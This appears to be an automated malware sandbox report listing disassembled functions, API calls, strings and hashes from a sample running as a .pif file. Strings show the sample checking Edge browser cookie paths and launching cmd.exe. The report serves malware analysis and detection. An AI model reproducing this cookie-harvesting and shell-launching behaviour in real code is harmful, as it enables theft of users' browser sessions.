                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                                          • Instruction ID: cc706be78aa66dfe3d56ca5a22c81b624ed334637ae42726f98964afea0ffe37
                                                                                                                                                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF012B18046219FCA31EB2CBD456093B65BB48B20B0441A7F41CA2B70D7B04AC2CFCF
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12374048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 12374066
                                                                                                                                                                                            • Part of subcall function 12376782: RtlFreeHeap.NTDLL(00000000,00000000,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?), ref: 12376798
                                                                                                                                                                                            • Part of subcall function 12376782: GetLastError.KERNEL32(?,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?,?), ref: 123767AA
                                                                                                                                                                                          • _free.LIBCMT ref: 12374078
                                                                                                                                                                                          • _free.LIBCMT ref: 1237408B
                                                                                                                                                                                          • _free.LIBCMT ref: 1237409C
                                                                                                                                                                                          • _free.LIBCMT ref: 123740AD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 1fa212aea2e094c9b98041fc7b4ea83fb12ca6ce6ebaaa8b22a46a8b30ae5b5b
                                                                                                                                                                                          • Instruction ID: 60aedf6ba90c73e333abf20d0eadc7911d2e39a27a38415b1b6fdf571c54cf53
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fa212aea2e094c9b98041fc7b4ea83fb12ca6ce6ebaaa8b22a46a8b30ae5b5b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F090FA8801398FEB318F2898C04153B29F7947A13405A2AF029D2660CB395E42EFC2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B628 Relevance: 7.5, APIs: 5, Instructions: 28memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVersionExA.KERNEL32(?), ref: 0040B63E
                                                                                                                                                                                          • TlsAlloc.KERNEL32(?), ref: 0040B64F
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 0040B665
                                                                                                                                                                                          • TlsSetValue.KERNEL32(?,?,?,?,0000001C,?), ref: 0040B676
                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,?,?,?,0000001C,?), ref: 0040B67B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc$QueryValueVersionVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4111955057-0
                                                                                                                                                                                          • Opcode ID: 4e753a6cc7b253fcce6ea3a1439e0590325210fbb9c4bc7a8b22a5e8403a9220
                                                                                                                                                                                          • Instruction ID: 64d802b366df9ffe340a536ca48f64c90ae43d30425c1319df72fdf1fd3218fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e753a6cc7b253fcce6ea3a1439e0590325210fbb9c4bc7a8b22a5e8403a9220
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81F012B14443019AD710EFB1DDC1A9B7398EB88314F00893EB65897281D7BD95499F9E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0059995C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 328COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                          • String ID: <fF$hdF$NG
                                                                                                                                                                                          • API String ID: 3732870572-2168386591
                                                                                                                                                                                          • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                                                                                                                                                                          • Instruction ID: d09029c639586a2fd51c7bdda09592acdf342c3f66ffc8253cd495912437a790
                                                                                                                                                                                          • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 31B18131508341AFDB14FB68C896AAFBBE9BFC4310F50491DF48A92292EF359D058B57
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E69BD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __dosmaperr
                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                          • API String ID: 2332233096-2852464175
                                                                                                                                                                                          • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                                                                                                                          • Instruction ID: 7440b241a6174685bf1e40b335afa1c4e34eeb5fd5c5a2d40484f5bb7d553e18
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60A14432A101859FCF1CAF68DC567AE7FA0FB463A0F24025AE851EB392DB318C52C755
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005DBA2B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 216COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __freea
                                                                                                                                                                                          • String ID: PkGNG
                                                                                                                                                                                          • API String ID: 240046367-263838557
                                                                                                                                                                                          • Opcode ID: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                                                                                                                                                                                          • Instruction ID: c31558e7e6e74745f6a05ccf506406549cc0ad77bc00776177ee133ba80a4e64
                                                                                                                                                                                          • Opcode Fuzzy Hash: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB518072610217EBEB358F68CC45EAA7FAAFB84750F16462BFC04E7250EB74DC808650
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004013E4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(80000000,?,?), ref: 00401424
                                                                                                                                                                                          • RegQueryValueA.ADVAPI32(?,?,?,00000100), ref: 00401449
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000100,80000000,?,?), ref: 00401470
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: Sun
                                                                                                                                                                                          • API String ID: 3677997916-1777960983
                                                                                                                                                                                          • Opcode ID: e40e27801e12837888f6718cf7172a39cad2c9d398c183f299d24010d73cb072
                                                                                                                                                                                          • Instruction ID: c5084538d5e008a304e2dd35038a48b73e5a144ba9705b53fd972559b966f926
                                                                                                                                                                                          • Opcode Fuzzy Hash: e40e27801e12837888f6718cf7172a39cad2c9d398c183f299d24010d73cb072
                                                                                                                                                                                          • Instruction Fuzzy Hash: 945172F2C106056BD610EAB1DC82EE7736CAF94304F044D3EBA5AA1182FB79670896F5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005DF4CB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free_strpbrk
                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                          • API String ID: 3300345361-3972193922
                                                                                                                                                                                          • Opcode ID: 91845898048f44b95c99453f11eaab977acc7f23da76a048fa7291357599bc12
                                                                                                                                                                                          • Instruction ID: dca0615ddbb384378e7faab843902bde2c60bd0346dc8977366605fc0da7cc88
                                                                                                                                                                                          • Opcode Fuzzy Hash: 91845898048f44b95c99453f11eaab977acc7f23da76a048fa7291357599bc12
                                                                                                                                                                                          • Instruction Fuzzy Hash: 57517E75E0020AAFDF24DFACD885AADBBF5FF98314F24816BE455E7350E6319A018B50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1237E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _strpbrk.LIBCMT ref: 1237E738
                                                                                                                                                                                          • _free.LIBCMT ref: 1237E855
                                                                                                                                                                                            • Part of subcall function 1236BD19: IsProcessorFeaturePresent.KERNEL32(00000017,1236BCEB,1233A71B,?,?,00000000,1233A71B,00000000,?,?,1236BD0B,00000000,00000000,00000000,00000000,00000000), ref: 1236BD1B
                                                                                                                                                                                            • Part of subcall function 1236BD19: GetCurrentProcess.KERNEL32(C0000417,?,1233A71B), ref: 1236BD3D
                                                                                                                                                                                            • Part of subcall function 1236BD19: TerminateProcess.KERNEL32(00000000), ref: 1236BD44
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                          • API String ID: 2812119850-3972193922
                                                                                                                                                                                          • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                                                                                          • Instruction ID: b6722b8d2f7cb309bb77622480a799c04c9084dc611834e98a4e79740c0f4cd1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26519476E0024AEFDF14CFA8C880AEDBBF9EF48714F254169D554E7340E679AA01CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E79FC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID: &i^$&i^
                                                                                                                                                                                          • API String ID: 269201875-2997179078
                                                                                                                                                                                          • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                                                                                                                          • Instruction ID: 67be60aa6303b610ba582c280609700b63851ff00c2861c3163bcdcdff90decd
                                                                                                                                                                                          • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C415D3190854AABDB386ABE8C4DA6E3EA9FF89330F140667F454C3391F670494193A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D3167 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D32C0
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D32D5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID: B1]$B1]
                                                                                                                                                                                          • API String ID: 885266447-3465817952
                                                                                                                                                                                          • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                                                                                          • Instruction ID: 3f32623d037a7fdb7520e1cb6cfe600f2c6478437013cd24dc57257d2fbb0e5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                                                                                          • Instruction Fuzzy Hash: F7515C75E00149ABCB24DF9CC884AADBFB2FB98314F19825BE81897361D7719E51CB41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14644BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\wkrriuhD.pif,00000104), ref: 14644C1D
                                                                                                                                                                                          • _free.LIBCMT ref: 14644CE8
                                                                                                                                                                                          • _free.LIBCMT ref: 14644CF2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                          • String ID: C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                          • API String ID: 2506810119-97380468
                                                                                                                                                                                          • Opcode ID: 01783ab0519835c1b7ad7777f97764c03a1b3736e5922a2c74f9f90586a1fbb3
                                                                                                                                                                                          • Instruction ID: 23c94e76ad30daf6e4c120fcc541fd782d4589c6806dc5e5d6a19f62eeb1eb1f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 01783ab0519835c1b7ad7777f97764c03a1b3736e5922a2c74f9f90586a1fbb3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1231A3B5A01258EFDF22DF99C8C199EBBFCEF9571CF28417AE904A7200D6709A41CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12373435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\wkrriuhD.pif,00000104), ref: 12373475
                                                                                                                                                                                          • _free.LIBCMT ref: 12373540
                                                                                                                                                                                          • _free.LIBCMT ref: 1237354A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                          • String ID: C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                          • API String ID: 2506810119-97380468
                                                                                                                                                                                          • Opcode ID: 078efde8bfca4d61ea2a5a747fc538c25393828876438215cb2d2ff479641c62
                                                                                                                                                                                          • Instruction ID: 725d1dd8174ef4b613e787a34df763b48fe0536257e62750006d46a75c068c2c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 078efde8bfca4d61ea2a5a747fc538c25393828876438215cb2d2ff479641c62
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE3185B6A04268EFDF25CF99D8C5EAEBBFCEF85314F104166E405D7200DA789A41CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 1233C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 1233C559
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 1233C6EC
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 1233C757
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • User Data\Default\Network\Cookies, xrefs: 1233C6D2
                                                                                                                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 1233C704
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                                          • API String ID: 1174141254-1980882731
                                                                                                                                                                                          • Opcode ID: 4cc4ef6da4b79302f71cebb039d9d04bd1d85a9bdfd7516c45d5dc4cfaf15767
                                                                                                                                                                                          • Instruction ID: 66ca1cab1be412d5e10fce4a82d4ce8b42bf50596eeaa3b1259a052eaeb12612
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cc4ef6da4b79302f71cebb039d9d04bd1d85a9bdfd7516c45d5dc4cfaf15767
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11216377D001199ACB66EBA2DC55CFEBB7CEE50312F000529E542A3190EF24BB4AC790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,12335159), ref: 12335173
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 123351CA
                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 123351D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                          • String ID: Connection Timeout
                                                                                                                                                                                          • API String ID: 2055531096-499159329
                                                                                                                                                                                          • Opcode ID: ed3ebf07dcb93779e171bbc71baf3d4863c38f5585b32e81333ddbe9ab829eb0
                                                                                                                                                                                          • Instruction ID: 6ac3b5d757012ed137c9f29c646625e56bb23d2bd30137a8a33460e60906fe5b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed3ebf07dcb93779e171bbc71baf3d4863c38f5585b32e81333ddbe9ab829eb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801F777951B40AFEB376B36CCC146BBBE9FF453033000A2DD18386BA1DA60A501CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 1233E833
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                                                                                                          • Opcode ID: a44fc1b162c1056fe6c776de6fccc7c4500569bcc29f8391e81fc3998ab4a7a1
                                                                                                                                                                                          • Instruction ID: 415a46f86ba2516cd97a1a2c667e483b75795c673890ab5d3939e4d0e6e3ac6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: a44fc1b162c1056fe6c776de6fccc7c4500569bcc29f8391e81fc3998ab4a7a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67018177C843087EFB6AEA90CC42FF9776C5F10B07F008519EA15A90C1EA25B742C6B2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123460EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 12346130
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
